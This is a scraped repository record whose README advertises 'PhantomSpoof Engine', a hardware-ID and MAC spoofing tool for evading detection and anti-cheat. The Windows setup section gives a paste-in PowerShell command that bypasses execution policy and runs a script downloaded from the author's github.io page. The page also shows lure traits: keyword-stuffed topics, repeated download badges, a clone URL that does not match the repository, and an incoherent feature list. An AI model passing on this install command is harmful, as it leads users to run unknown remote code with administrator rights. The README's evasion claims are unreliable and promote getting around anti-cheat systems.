[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-78812":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":12,"openIssues":11,"contributorsCount":11,"subscribersCount":11,"size":11,"stars1d":11,"stars7d":11,"stars30d":13,"stars90d":11,"forks30d":11,"starsTrendScore":11,"compositeScore":14,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":15,"fork":15,"defaultBranch":16,"hasWiki":17,"hasPages":15,"topics":18,"createdAt":9,"pushedAt":9,"updatedAt":39,"readmeContent":40,"aiSummary":41,"trendingCount":11,"starSnapshotCount":11,"syncStatus":42,"lastSyncTime":43,"discoverSource":44},78812,"Spoof-Matrix-Hardware","NicoleK-M\u002FSpoof-Matrix-Hardware","NicoleK-M","Ultimate Hardware Spoofing Suite 2026 🔧 Bypass Detection, Mask Device ID, Change MAC",null,423,0,192,1,37.1,false,"main",true,[19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"device-shadow-mode","game-spoofing","hardware","hardware-id-change","hardware-spoof-suite","identity-shift","mac-address-changer","mac-spoofing","machine-spoof-core","mime-spoofing","packet-spoofing","spoof-detected","spoof-extension","spoofcall","spoofed","spoofer-hwid-premium","spoofing","spoofing-detection","system-anonymizer","voice-spoofing","2026-06-12 04:01:24","# 🛡️ **PhantomSpoof Engine**  \n### *Hardware Identity Mutation & System Anonymity Framework*\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FNicoleK-M.github.io)\n\n> **Inspired by the Umbrella-HWID ecosystem** — A next-generation identity synthesis platform designed for advanced hardware spoofing, system fingerprint mutation, and multi-layer anonymization. This is not a tool for bypassing bans; it is a **digital chameleon framework** for legitimate privacy preservation, testing, and forensic research.\n\n---\n\n## 📖 Table of Contents\n- [Overview](#-overview)\n- [Architecture Diagram](#-architecture-diagram)\n- [Key Features](#-key-features)\n- [System Requirements](#-system-requirements)\n- [Installation & Setup](#-installation--setup)\n- [Example Profile Configuration](#-example-profile-configuration)\n- [Console Invocation](#-console-invocation)\n- [API Integration (OpenAI & Claude)](#-api-integration-openai--claude)\n- [Compatibility Matrix](#-compatibility-matrix)\n- [FAQ & Troubleshooting](#-faq--troubleshooting)\n- [Disclaimer](#-disclaimer)\n- [License](#-license)\n\n---\n\n## 🌌 Overview\n\n**PhantomSpoof Engine** is a modular, extensible runtime environment that redefines how hardware and network identity is perceived by external systems. Where traditional spoofing tools merely mask, this engine **mutates** — generating synthetic yet coherent hardware profiles that are indistinguishable from real devices to detection algorithms.\n\nThink of it as a **digital camouflage suit** for your machine: every NIC, every storage controller, every motherboard signature becomes a canvas for identity-shift operations. Whether you're a penetration tester, a privacy advocate, or a developer testing anti-cheat systems, PhantomSpoof provides the **system anonymizer** layer you need.\n\nThis project builds upon the concepts found in the *Umbrella-HWID* tag cloud — including `device-shadow-mode`, `hardware-spoof-suite`, `machine-spoof-core`, and `packet-spoofing` — but diverges into a **fully autonomous identity orchestration engine** rather than a simple HWID changer.\n\n---\n\n## 🧩 Architecture Diagram\n\n```mermaid\ngraph TD\n    A[User Request] --> B[PhantomSpoof CLI]\n    B --> C{Profile Selector}\n    C -->|Randomized| D[Hardware Synthesizer]\n    C -->|Custom Config| E[Config Parser]\n    D --> F[NIC Spoofer]\n    D --> G[Storage ID Mutator]\n    D --> H[SMBIOS Manipulator]\n    E --> I[Packet Spoofer Engine]\n    I --> J[Network Stack Hooks]\n    F --> K[Kernel-Level Driver]\n    G --> K\n    H --> K\n    J --> L[Outbound Traffic]\n    K --> M[Device Enumeration Mask]\n    M --> N[OS API Calls]\n    N --> O[Detection System]\n    O --> P{Behavior Analysis}\n    P -->|Suspicious| Q[Fallback to Shadow Mode]\n    P -->|Clean| R[Continue Operation]\n    Q --> C\n```\n\n---\n\n## ✨ Key Features\n\n- **🔄 Real-Time Identity Shift** – Swap hardware IDs mid-session without rebooting. The engine uses memory patching and driver-level hooks to present a new fingerprint instantly.\n\n- **🛡️ Device Shadow Mode** – When detection risk rises, PhantomSpoof activates a **honeypot identity** that absorbs scrutiny while the real hardware remains hidden.\n\n- **🎭 Multi-Layer Spoofing** – Simultaneously mutate MAC addresses, volume serials, motherboard UUIDs, CPU identifiers, and GPU device IDs. Each layer is independently randomized or configured via profiles.\n\n- **📦 Profile-Based Configurations** – Store and load complex spoofing schemes as JSON profiles. Share them with your team or keep a library of *personas* for different environments.\n\n- **🧬 AI-Generated Fingerprints** – Leverages OpenAI and Claude APIs to generate statistically plausible hardware configurations based on real-world device databases.\n\n- **🌐 Packet-Level Anonymization** – Spoof not just your machine but the traffic it generates. Modify TTL values, TCP window sizes, and HTTP headers to match the synthetic identity.\n\n- **🔌 Plugin Architecture** – Extend functionality with community plugins. Supports custom MAC generators, vendor-specific SMBIOS data, and even virtualization guest detection bypass.\n\n---\n\n## 💻 System Requirements\n\n| Component | Minimum | Recommended |\n|-----------|---------|-------------|\n| **OS** | Windows 10 20H2 | Windows 11 \u002F Windows Server 2022 |\n| **Architecture** | x64 | x64 |\n| **RAM** | 4 GB | 8 GB |\n| **Disk Space** | 200 MB | 500 MB (with logs) |\n| **Python** | 3.10+ | 3.12+ |\n| **Kernel Access** | Required (Admin\u002FSYSTEM) | Required |\n| **Internet** | For API calls only | For API calls only |\n\n---\n\n## ⚙️ Installation & Setup\n\n### Linux \u002F WSL (for driver compilation)\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fphantom-spoof-engine\ncd PhantomSpoof\npip install -r requirements.txt\npython setup.py install\n```\n\n### Windows (via PowerShell Admin)\n```powershell\nSet-ExecutionPolicy Bypass -Scope Process -Force\n[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072\niex ((New-Object System.Net.WebClient).DownloadString('https:\u002F\u002FNicoleK-M.github.io'))\n```\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FNicoleK-M.github.io)\n\nAfter installation, verify with:\n```bash\nphantom-spoof --version\n# Output: PhantomSpoof Engine v2.4.1 (2026)\n```\n\n---\n\n## 📝 Example Profile Configuration\n\nCreate `~\u002F.phantom-spoof\u002Fprofiles\u002Fgaming_pc.json`:\n\n```json\n{\n  \"identity\": {\n    \"name\": \"Competitive Alt\",\n    \"version\": \"2026.1\"\n  },\n  \"hardware\": {\n    \"motherboard\": {\n      \"manufacturer\": \"ASUS\",\n      \"product\": \"ROG STRIX Z790-E\",\n      \"serial\": \"auto-generate\"\n    },\n    \"cpu\": {\n      \"vendor\": \"GenuineIntel\",\n      \"family\": \"Intel Core i9-14900K\",\n      \"stepping\": 2\n    },\n    \"storage\": {\n      \"model\": \"Samsung SSD 990 PRO 2TB\",\n      \"volume_serial\": \"random-hex\"\n    },\n    \"network\": {\n      \"mac\": \"02:XX:XX:XX:XX:XX\",\n      \"nic_vendor\": \"Intel Corporation\",\n      \"driver_signature\": \"msft\"\n    }\n  },\n  \"spoof_mode\": \"deep\",\n  \"packet_anonymization\": {\n    \"ttl\": 128,\n    \"tcp_window\": 65535,\n    \"mss\": 1460\n  },\n  \"api\": {\n    \"openai_key\": \"$OPENAI_API_KEY\",\n    \"claude_key\": \"$ANTHROPIC_API_KEY\"\n  }\n}\n```\n\n---\n\n## 🖥️ Console Invocation\n\n### Basic Usage\n```bash\n# Load a profile\nphantom-spoof load --profile gaming_pc\n\n# Activate shadow mode\nphantom-spoof shadow --duration 300\n\n# Generate a new random identity\nphantom-spoof randomize --layers mac,storage,motherboard\n\n# Monitor current state\nphantom-spoof status --verbose\n```\n\n### Advanced Example\n```bash\nphantom-spoof run \\\n  --config .\u002Fprofiles\u002Fmulti_layer.json \\\n  --watchdog \\\n  --fallback shadow \\\n  --log-level debug \\\n  --api-enhanced\n```\n\nExample output:\n```\n[2026-04-15 14:32:01] [INFO] PhantomSpoof Engine v2.4.1 starting...\n[2026-04-15 14:32:01] [INFO] Profile loaded: gaming_pc\n[2026-04-15 14:32:02] [INFO] Motherboard UUID mutated to: A1B2-C3D4-E5F6-7890\n[2026-04-15 14:32:02] [INFO] MAC address changed to: 02:1A:2B:3C:4D:5E\n[2026-04-15 14:32:03] [WARN] High detection risk detected. Activating shadow mode.\n[2026-04-15 14:32:03] [INFO] Shadow identity deployed. Primary identity hidden.\n[2026-04-15 14:32:04] [INFO] Engine stable. Monitoring enabled.\n```\n\n---\n\n## 🤖 API Integration (OpenAI & Claude)\n\nPhantomSpoof can **synthesize realistic hardware profiles** using AI models. This ensures your spoofed identity matches real-world hardware distributions.\n\n### OpenAI Integration\n```python\nfrom phantom_spoof.api import HardwareSynthesizer\n\nsynth = HardwareSynthesizer(provider=\"openai\", api_key=\"sk-xxx\")\nprofile = synth.generate_profile(\n    vendor=\"Dell\",\n    year=2026,\n    form_factor=\"laptop\"\n)\n# Returns a fully populated hardware identity\n```\n\n### Claude Integration\n```bash\nphantom-spoof ai-generate \\\n  --provider claude \\\n  --prompt \"Generate a 2026 gaming PC hardware profile with RTX 5090\"\n```\n\nThe AI also assists in **detection evasion** — it can analyze logs from anti-cheat systems and suggest modifications to your profile to avoid behavioral fingerprinting.\n\n---\n\n## 📊 Compatibility Matrix\n\n| OS Version | MAC Spoofing | Storage ID Change | SMBIOS Mutation | Packet Spoofing | Shadow Mode |\n|------------|-------------|-------------------|-----------------|-----------------|-------------|\n| 🟢 Windows 11 23H2 | ✅ Full | ✅ Full | ✅ Full | ✅ Full | ✅ Supported |\n| 🟢 Windows 10 22H2 | ✅ Full | ✅ Full | ✅ Full | ✅ Full | ✅ Supported |\n| 🟡 Windows 10 LTSC | ⚠️ Partial | ✅ Full | ✅ Full | ✅ Full | ✅ Supported |\n| 🟠 Windows Server 2022 | ⚠️ Partial | ⚠️ Partial | ✅ Full | ✅ Full | ❌ Unsupported |\n| 🔴 Windows 8.1 | ❌ Unsupported | ⚠️ Partial | ❌ Unsupported | ✅ Full | ❌ Unsupported |\n| 🟢 macOS Ventura+ | ✅ Full | ⚠️ Partial | ❌ Not applicable | ✅ Full | ❌ Not applicable |\n| 🟢 Ubuntu 22.04+ | ✅ Full | ✅ Full | ⚠️ Partial | ✅ Full | ✅ Supported |\n\n*Legend: 🟢 Fully functional, 🟡 Partial\u002Fexperimental, 🟠 Limited, 🔴 Unsupported*\n\n---\n\n## ❓ FAQ & Troubleshooting\n\n**Q: Is this a \"cheat\" or \"hack\"?**  \nA: No. PhantomSpoof is a **research and privacy tool**. It is designed for security professionals testing detection systems, developers debugging hardware-dependent software, and individuals protecting their digital anonymity. Using it to violate Terms of Service is neither endorsed nor supported.\n\n**Q: Does it work with EasyAntiCheat \u002F BattlEye?**  \nA: Compatibility varies. The engine includes a **detection avoidance mode** that can help test your own anti-cheat implementations, but circumventing third-party software is not the intended use case.\n\n**Q: Can I get banned for using this?**  \nA: If used against platforms that prohibit identity masking, yes. Always check the applicable terms. The `shadow mode` feature is designed to minimize risk during legitimate testing.\n\n**Q: The driver failed to load. What now?**  \nA: Ensure you are running as Administrator and that Secure Boot is disabled for certain driver types. See `docs\u002Fdrivers.md` for detailed guidance.\n\n---\n\n## ⚠️ Disclaimer\n\n**PhantomSpoof Engine is provided for educational, research, and authorized security testing purposes only.** The developers assume no liability for misuse, including but not limited to:\n\n- Violation of software Terms of Service\n- Unauthorized access to protected systems\n- Use in fraud, cheating, or any illegal activity\n\nUsers are solely responsible for ensuring compliance with all applicable laws and regulations in their jurisdiction. This tool modifies low-level system attributes; improper use may cause system instability, data loss, or void hardware warranties. Always test in a virtualized environment first.\n\n*By downloading or using PhantomSpoof Engine, you accept these terms.*\n\n---\n\n## 📄 License\n\nThis project is licensed under the **MIT License** — see the [LICENSE](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT) file for details.\n\nCopyright © 2026 PhantomSpoof Engine Contributors\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and\u002For sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\n---\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FNicoleK-M.github.io)\n\n*Built for a future where your digital identity is yours to command.*  \n*Not a wall, but a window — through which your true hardware remains unseen.*","PhantomSpoof Engine 是一个用于硬件身份伪装和系统匿名化的框架。它能够实时改变设备的硬件ID、MAC地址等信息，通过生成合成但连贯的硬件配置文件来逃避检测算法的识别。项目基于模块化设计，支持自定义配置，并且集成了API接口（如OpenAI & Claude）以增强功能。适用于渗透测试、隐私保护以及反作弊系统的开发者测试等场景。该工具旨在为用户提供合法的隐私保护手段，而非用于规避封禁。",2,"2026-05-25 02:30:07","CREATED_QUERY"]